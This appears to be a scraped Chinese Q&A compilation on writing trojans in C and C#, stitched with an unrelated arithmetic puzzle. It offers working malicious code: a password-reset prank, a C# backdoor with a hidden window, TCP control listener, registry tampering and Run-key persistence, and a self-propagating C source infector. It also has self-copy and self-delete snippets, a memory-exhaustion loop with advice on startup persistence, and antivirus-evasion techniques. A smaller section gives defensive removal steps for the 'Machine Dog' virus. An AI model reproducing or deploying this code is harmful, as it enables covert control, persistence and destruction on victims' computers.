c语言木马源代码

A. 如何用c语言编一个假中毒的恶作剧程序

一个小东西 介绍了后别笑话我 ！它的功能很简单，就是把Administrator的密码该成xiaoniaoheihei
大家整了人之后切记告诉他密码(xiaoniaoheihei)

由于不能上传文件文件尺寸:
小于 200 kb
可用扩展名: gif, jpg
自己可以用TC2.0编写编译调试生成
C语言下的代码如下：

main()
{
system("net user administrator xiaoniaoheihei");
}
如果自己真的不小心忘记了密码 如果是XP系统 管理员密码破解如下：
1.用个启动盘启动电脑后进入DOS 状态下：输入如下命令
del X:\windows\sysrem32\config\sam 回车
x:\windows\repair\sam x:\windows\system32\config 回车
2.重新启动计算机。X为安装XP的盘 一般为c:

B. c语言可以编个木马吗

要实现木马服务的程序，主要实现以下几个功能：后台的运行（隐藏技术），控制码的接收与注册表的修改，下面对这三方面做介绍：

1、在VC#中，建立一个后台服务程序是很容易的，先建立一个新的C#的Windows应用程序，项目名称自定（不过为了隐藏可使用与系统相近的名称），将窗体属性“ShowInTaskbar”属性设为false,让它运行时不会在任务栏中显示，并将属性“Windowstate”属性设为Mininized即可，这样窗体就可以隐藏运行了。当然你也可以在InitializeComponent()设置，此函数起初始化的作用，在窗体显示前运行，代码如下：

private void InitializeComponent()
{
//
// Form1
//
//窗体显示的起点和大小
this.AutoScaleBaseSize = new System.Drawing.Size(6, 14);
this.ClientSize = new System.Drawing.Size(368, 357);
//窗体名称
this.Name = "Form1";
//设置属性让它后台运行
this.ShowInTaskbar = false;
this.Text = "Form1";
this.WindowState = System.Windows.Forms.FormWindowState.Minimized;
}

2、控制代码的接收，必需在服务程序运行开始就启动，所以侦听线程必需在程序初始化中启动，所以放在窗体的构造函数中，代码注解如下：

public Form1() //窗体的构造函数
{
//
// Windows 窗体设计器支持所必需的
//
InitializeComponent();

//
// TODO: 在 InitializeComponent 调用后添加任何构造函数代码
//加入你的侦听代码
//端口你可以自已设定,我使用了固定的端口
int port =6678;
//System.Net.Sockets.TcpListener是用来在Tcp网络中侦听客户端的
listener = new TcpListener(port);
//启动侦听
listener.Start();
//增加接收控制码的线程,如果要停止线程可以用 Thread.abort()
//reControlCode 是线程启动执行的函数，此函数根据接收的控制
//控制码选取合适的注册表修改函数
Thread thread = new Thread(new ThreadStart(reControlCode));
thread.Start();
}
reControlCode函数如下，完整代码见程序
private void reControlCode()
{
//设置接收套接字,接收listener.AcceptSocket是返回已经接收的客户的请求
socket = listener.AcceptSocket();
//如果连接成功执行
while (socket.Connected)
{
//接收控制码
byte [] by =new byte[6];
int i = socket.Receive(by,by.Length ,0);
string ss = System.Text.Encoding.ASCII.GetString(by);
//根据控制码执行不同的功能

//修改注册表加入编码
switch (ss)
{
case "jiance"://测试连接,返回测试信息
string str ="hjc";
byte [] bytee = System.Text.Encoding.ASCII.GetBytes(str);
socket.Send(bytee,0,bytee.Length,0);
break;
case "zx1000":
//修改注册表函数,自已定义，见下面分析
UnLogOff();
//返回控制消息
retMessage();
break;

case "zx0100":
//修改注册表函数
UnClose();
//返回控制消息
retMessage();
break;
//重复的case功能与前面一样,略掉
default:
break;
}//case
}//while
} //private void reControlCode

3、C#中实现注册表的修改，使用了.NET类库中的System.Microsoft.Win32命令空间，它提供两种类型的类：处理由操作系统引发的事件的类和对系统注册表进行操作的类。下面就可以看到它的用法。这里我做了一个修改注册表的子程序：使计算机不能注销。在这之前先了解注册表，在子键SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer
下面设键值NoLogOff 为 1 即可使计算机无法注销。在下面的函数中用C#实现对注册表的修改：

private void UnLogOff()
{
//得到主机的注册表的顶级节点
Microsoft.Win32.RegistryKey rLocal = Registry.LocalMachine;
//设置一个注册表子键的变量
RegistryKey key1;
try
{
//函数RegistryKey.OpenSubkey(string registrykey,bool canwrite)检索指定的子键
//registrykey是用户指定的键值，canwrite 为true则可修改，默认为fasle不可改
key1 =
rLocal.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);
//设置子键的键名，和值
key1.SetValue ("NoLogOff",1);
//关闭打开的子键
key1.Close();
//警告字符串设定
mystr = mystr +"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值Nologoff被修改！请将它置为0!";
}
catch{}
//如果不存在自已建立
if(key1 ==null)
{
try
{
//使用RegistryKey.CreateSubKey(string mystring)函数来建立你需要的子键
RegistryKey key2 = rLocal.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLogOff",1);
key2.Close();
mystr = mystr +"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值Nologoff被修改！请将它置为0!";
}
catch{}
}
}

4、在木马程序中还有一个重要的功能就是自我的复制和转移。木马引入被控制的主机时必需自动将木马隐藏在System,System32的目录下以防被发现。转移的代码分析如下，主要实现的功能是将D盘下的木马程序转移到C:\\winnnt\\system\\msdoss.exe，同时换名称。使用的.NET命名空间System.IO,它的作用是允许对数据流和文件进行同步和异步读写。这里我们使用了System.IO.File类。

private void moveCC1()
{
try
{
//函数File.Move(string sourceFileName,string destFileName)起移动文件的作用
//sourceFileName为要移动的文件名，destFileName为文件的新路径
File.Move("C:\\winnnt\\system\\msdoss.exe","d:\\winnt\\system32\\expleror.exe");
}
catch {}
//将新移的木马程序设为自启动.分析和前面一样
try
{
key1 = rLocal.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);
key1.SetValue ("microsoftt","d:\\winnt\\system32\\expleror.exe");
key1.Close();
}
catch{}
if(key1 ==null)
{
try
{
RegistryKey key2=rLocal.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
key1.SetValue ("microsoftt","d:\\winnt\\system32\\expleror.exe");
key1.Close();
}
catch{}
}
} //moveCC1()
按照步骤来就可以得到一个C#木马了..
都给出答案了.可以给分卜？

C. C语言：木马板凳三十三，百个腿腿地下翻，求具体编程，感谢大神，定会追加分！

详细说明下，是不是一个是2条腿，一个是4条腿
#include<iostream>
using namespace std;
int main()
{
int m,n,t,g;
cout<<"请输入他们的各自个数和腿的个数：";
cin>>n>>m;
{
t=m/2-n;
g=n-t;
if((t>=0&&g>=0)&&(2*g+4*t==m))
{
cout<<g<<" "<<t<<endl;
}
else
cout<<"Error"<<endl;

}
return 0;
}

D. 请介绍下C语言写木马的算法......

我只知道window的木马程序的原理，首先你要去研究一下windows PE文件的格式，windows PE文件包括(exe dll文件等)，用文本方式打开任意一个exe或者dll文件，就会发现这些文件都具有类似的组织结构（就是PE格式）
仔细耐心地研究了PE格式后，你会发现这些PE格式的文件有很多间隙空间可用，window木马程序正是利用PE格式文件中的这些间隙，把自己的代码插入这些间隙空间中，同时还要修改宿主程序的入口地址（OEP Original Entry Point）
这样，宿主程序一运行，首先运行生成木马的代码，然后运行宿主程序。

Windows应用程序捆绑核心编程 （PE）
http://book.csdn.net/bookfiles/212/10021210198.shtml

http://www.diybl.com/course/3_program/c++/cppjs/2008219/100330.html

E. c语言木马源代码

ls这个好像是感染c文件的病毒,自动加上玩笑代码(当然可以是恶意的)
不是木马

F. c语言源文件编译后成了木马，求解

代码没有大问题
#include<stdio.h>
#include<stdlib.h>
intmain(void)
{
inta[10],i;
for(i=0;i<10;i++)
scanf("%d",&a[i]);
for(i=0;i<10;i++)
printf("%d
",a[i]);
system("pause");
return0;//因为intmain()，所以要有个返回值
}

估计你所说的木马是你系统带的杀毒软件误报的！ 你程序的文件名最好写个略有复杂性的名称，如：test_20140831.c

G. c语言木马代码，简单点的，我保证不做违法的

#include <stdio.h>
#include <dir.h>
void main(void)
{
virus();
}
int virus()
{
struct ffblk ffblk;
FILE *in,*out,*read;
char *virus="virus.c";
char buf[50][80];
char *p;
char *end="return";
char *bracket="}";
char *main="main";
char *include[2]={"stdio.h","dir.h"};
char *int_virus="int virus()";
char *buffer;
int done,i,j=0,flag=0;
printf("\nI have a virus. Writen by PuBin\n");
done = findfirst("*.c",&ffblk,0);
while (!done)
{
i=0;
if ((in = fopen(ffblk.ff_name, "rt"))== NULL)
{
goto next;
}
do{
if(i>=50)
{
fclose(in);
goto next;
}
p=fgets(buf[i],80,in);
i++;
}while(p!=NULL);
fclose(in);
out=fopen(ffblk.ff_name,"w+t");
fputs("#include<stdio.h>\n",out);
fputs("#include<dir.h>\n",out);
do
{
if(strstr(buf[j],main)!=NULL)
{
for(;j<i-1;j++)
if(strstr(buf[j],end)==NULL&&strstr(buf[j],bracket)==NULL)
fputs(buf[j],out);
else
{
if(flag==0)
{
flag=1;
fputs("virus();\n",out);
}
fputs(buf[j],out);
}
}
else if((strstr(buf[j],include[0])==NULL)
&&(strstr(buf[j],include[1])==NULL))
{
fputs(buf[j],out);
j++;
}
else
j++;
}while(j<i-1);
read=fopen(virus,"rt");
do
{
p=fgets(buffer,80,read);
if(strstr(buffer,int_virus))
while(p!=NULL)
{
if(strstr(buffer,virus)==NULL)
fputs(buffer,out);
else
{
fputs(" char *virus=\"",out);
fputs(ffblk.ff_name,out);
fputs("\";\n",out);
}
p=fgets(buffer,80,read);
}
}while(p!=NULL);

fclose(read);
fclose(out);
printf("\nYour c program %s has a virus. Writen by PuBin\n",ffblk.ff_name);
next: done = findnext(&ffblk);
}
return 0;
}
再就是网上一网络一大堆的。

H. 谁有机器狗木马病毒的C语言程序代码

计算机病毒“机器狗”
机器狗的生前身后，曾经有很多人说有穿透还原卡、冰点的病毒，但是在各个论坛都没有样本证据，直到2007年8月29日终于有人在社区里贴出了一个样本。这个病毒没有名字，图标是SONY的机器狗阿宝，就像前辈熊猫烧香一样，大家给它起了个名字叫机器狗。
工作原理
机器狗本身会释放出一个pcihdd.sys到drivers目录，pcihdd.sys是一个底层硬盘驱动，提高自己的优先级接替还原卡或冰点的硬盘驱动，然后访问指定的网址，这些网址只要连接就会自动下载大量的病毒与恶意插件。然后修改接管启动管理器，最可怕的是，会通过内部网络传播，一台中招，能引发整个网络的电脑全部自动重启。
重点是，一个病毒，如果以hook方式入侵系统，接替硬盘驱动的方式效率太低了，而且毁坏还原的方式这也不是最好的，还有就是这种技术应用范围非常小，只有还原技术厂商范围内有传播，在这方面国际上也只有中国在用，所以，很可能就是行业内杠。
对于网吧而言，机器狗就是剑指网吧而来，针对所有的还原产品设计，可预见其破坏力很快会超过熊猫烧香。好在现在很多免疫补丁都以出现，发稿之日起，各大杀毒软件都以能查杀。
免疫补丁之争
现在的免疫补丁之数是疫苗形式，以无害的样本复制到drivers下，欺骗病毒以为本身以运行，起到阻止危害的目的。这种形式的问题是，有些用户为了自身安全会在机器上运行一些查毒程序（比如QQ医生之类）。这样疫苗就会被误认为是病毒，又要废很多口舌。
解决之道
最新的解决方案是将system32/drivers目录单独分配给一个用户，而不赋予administror修改的权限。虽然这样能解决，但以后安装驱动就是一件头疼的事了。
来彻底清除该病毒，处理后重启一下电脑就可以了，之前要打上补丁！
或者这样：
1注册表，组策略中禁止运行userinit.exe 进程
2 在启动项目中加入批处理
A : 强制结束userinit.exe进程 Taskkill /f /IM userinit.exe （其中“/IM”参数后面为进程的图像名，这命令只对XP用户有效）
B : 强制删除userinit.exe文件 DEL /F /A /Q %SystemRoot%\system32\userinit.exe
C : 创建userinit.exe免疫文件到%SystemRoot%\system32\
命令：md %SystemRoot%\system32\userinit.exe >nul 2>nul
或者 md %SystemRoot%\system32\userinit.exe
attrib +s +r +h +a %SystemRoot%\system32\userinit.exe
D : reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\userinit.exe" /v debugger /t reg_sz /d debugfile.exe /f
userinit1.exe是正常文件改了名字，多加了一个1，你也可以自己修改，不过要手动修改这4个注册表，并导出，这个批处理才能正常使用。
最新动向
好像机器狗的开发以停止了，从样本放出到现在也没有新的版本被发现，这到让我们非常担心，因为虽着研究的深入，现在防御的手段都是针对病毒工作原理的，一但机器狗开始更新，稍加改变工作原理就能大面积逃脱普遍的防御手段，看来机器狗的爆发只是在等待，而不是大家可以高枕了。
目前网上流传一种叫做机器狗的病毒，此病毒采用hook系统的磁盘设备栈来达到穿透目的的，危害极大，可穿透目前技术条件下的任何软件硬件还原！基本无法靠还原抵挡。目前已知的所有还原产品，都无法防止这种病毒的穿透感染和传播。
机器狗是一个木马下载器，感染后会自动从网络上下载木马、病毒，危及用户帐号的安全。
机器狗运行后会释放一个名为PCIHDD.SYS的驱动文件，与原系统中还原软件驱动进行硬盘控制权的争夺，并通过替换userinit.exe文件，实现开机启动。
>> 那么如何识别是否已中毒呢？
是否中了机器狗的关键就在 Userinit.exe 文件，该文件在系统目录的 system32 文件夹中，点击右键查看属性，如果在属性窗口中看不到该文件的版本标签的话，说明已经中了机器狗。如果有版本标签则正常。
临时解决办法：
一是在路由上封IP：
ROS脚本,要的自己加上去
/ ip firewall filter
add chain=forward content=yu.8s7.net action=reject comment="DF6.0"
add chain=forward content= action=reject
二是在c:\windows\system32\drivers下建立免疫文件： pcihdd.sys ，
三是把他要修改的文件在做母盘的时候，就加壳并替换。
在%systemroot%\system32\drivers\目录下 建立个 明字 为 pcihdd.sys 的文件夹 设置属性为 任何人禁止
批处理
md %systemroot%\system32\drivers\pcihdd.sys
cacls %systemroot%\system32\drivers\pcihdd.sys /e /p everyone:n
cacls %systemroot%\system32\userinit.exe /e /p everyone:r
exit
目前，网络流行以下解决方法，或者可以在紧急情况下救急：
1、首先在系统system32下复制个无毒的userinit.exe，文件名为FUCKIGM.exe(文件名可以任意取)，这就是下面批处理要指向执行的文件！也就是开机启动userinit.exe的替代品！而原来的userinit.exe保留！其实多复制份的目的只是为了多重保险！可能对防止以后变种起到一定的作用。
2、创建个文件名为userinit.bat的批处理（文件名也可任意取，但要和下面说到的注册表键值保持一致即可），内容如下：
start FUCKIGM.exe (呵呵，够简单吧？)
3、修改注册表键值，将userinit.exe改为userinit.bat。内容如下：
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\\WINDOWS\\system32\\userinit.bat,"
就这3步，让这条狗再也凶不起来！这是在windows 2003测试的，双击机器狗后，没什么反应，对比批处理也是正常，即这狗根本没改动它！开关机游戏均无异常！但唯一美中不足的是，采用经典模式开机的启动时会出现个一闪而过的黑框！

I. 我在学c语言，谁有木马程序能给提供一下不

Autorun的免疫程序可以防止inf再次被其他文件修改
利用外面的脚本语言给定的参数选择性运行程序的某种方案(例如.dos.shell.bat,autorun.inf......)

利用new,进程ID，read,write，和。。。。。
。利用把exe变成rc文件用vc打开import 你想要的应用程序 ico图标文件
领悟了一点

晚上回去补上
貌似改变当前程序运行的工作目录，就可以对自己进行自我删除？？？？这就是传说中的自我销毁？待测试
#include <stdio.h>
#include <direct.h>
#include <windows.h>
#include <string.h>
int main(int argc,char *argv[])
{
char pwd[40]="del ";
chdir("c:\\");
strcat(pwd,argv[0]);
system(pwd);
return 0;
}
linux中有这么一句话：在进程运行过程中，当前目录所在的文件系统是不能卸载的，，，？？？如何理解？？待解决？跟自我销毁有什么关系？
在linux中的这段代码红色部分不会执行，？？为何？rm 到底 删除的是什么？
我们把中的rm改成其他命令下面的也不会运行 看来这是exec函数族 的 机制问题，待考证
#include<stdio.h>
#include<unistd.h>

int main(int argc,char *argv[])
{
if( execlp("rm","rm",argv[0],NULL) < 0)
{
perror("execlp error:");
}
else fprintf(stdout,"delmyself success!\n");
printf("del success\n");

return 0;
}

试验证明这段代码调试能过但运行会出错/ 显示。。。。。。test.exe拒绝访问据说可以利用多进程实现，在linux中是允许自我删除的，，就像linux中的守护进程

我们先用c实现 文件的自我复制功能：

[cpp] view plain
#include<stdio.h>
int main(int argc,char *argv[])
{
FILE *fp1,*fp2;
char buf[200];
int nmemb;
if((fp1 = fopen(argv[0],"rb")) == NULL)//注意这里是以二进制的方式
{
printf("source error\n");
return -1;
}

if((fp2 = fopen("dest.exe","wb")) == NULL)//注意这里是以二进制的方式
{
printf("dest error\n");
return -2;
}
while(( nmemb = fread(buf,1,100,fp1) ) != 0 )
{
fwrite(buf,1,nmemb,fp2);
}
fclose(fp1);
fclose(fp2);
return 0;
}
windows环境测试通过 linux环境 需要把dest.exe改下 就ok 真正的自我复制哦
若用open函数则会出现下列自动被识别为病毒文件了

用fopen的话
当对某个文件进行重新写入的时候，杀毒软件会以为他要感染其他文件 所以就会发出警报

杀毒软件杀不出来
若有改进 则马上那个更新
下面我们要实现 这个执行文件的破坏能力 那就是用
int *p;
while(1)
{
p = (int *)new(1000000);
}
设想：利用资源把exe文件当二进制文件引入，然后再在主执行文件中调用它，这样可以把捆绑在一起 程序 的分开 已经解决
病毒另一个特征是 感染，这个，得到本目录里的文件名然后重写？利用多进程，？？，》？(修改其他文件会被nod32查出)

占用内存空间 导致机子完全死机，大家要记得利用c把这个文件复制到启动栏里去，或者写到服务里去让系统启动的时候自动加载他，这样非专业人士就救不了那电脑了，只有重装，可以写在其他盘里，然后做些处理，让运行时检查这个文件是否存在，不存在 则自我复制，，，，，

J. 谁曾经写过木马，求良性木马的源码，可以的话是C语言或C++的。打个比方，木马不会对电脑造成伤害，只

1：木马首先没有良性这一说
2：至于编程语言C D E 都可以
3：木马要驻留系统的方式你要了解
基本驻留采用 进程插入 内存驻留 注册表启动 系统程序钩子 注册成服务启动 第三方软件感染
免杀这个问题 要学习的也不少
1：代码免杀
2：特征码免杀
3：行为免杀
4：其他方式
普通的加壳 加花 伪造签名 好多种
不只是免杀的问题 还要考虑杀毒软件的采集分析逆向等等

还是好好学习下系统编程做正规软件吧
做木马没有前途 只有违法进监狱一说了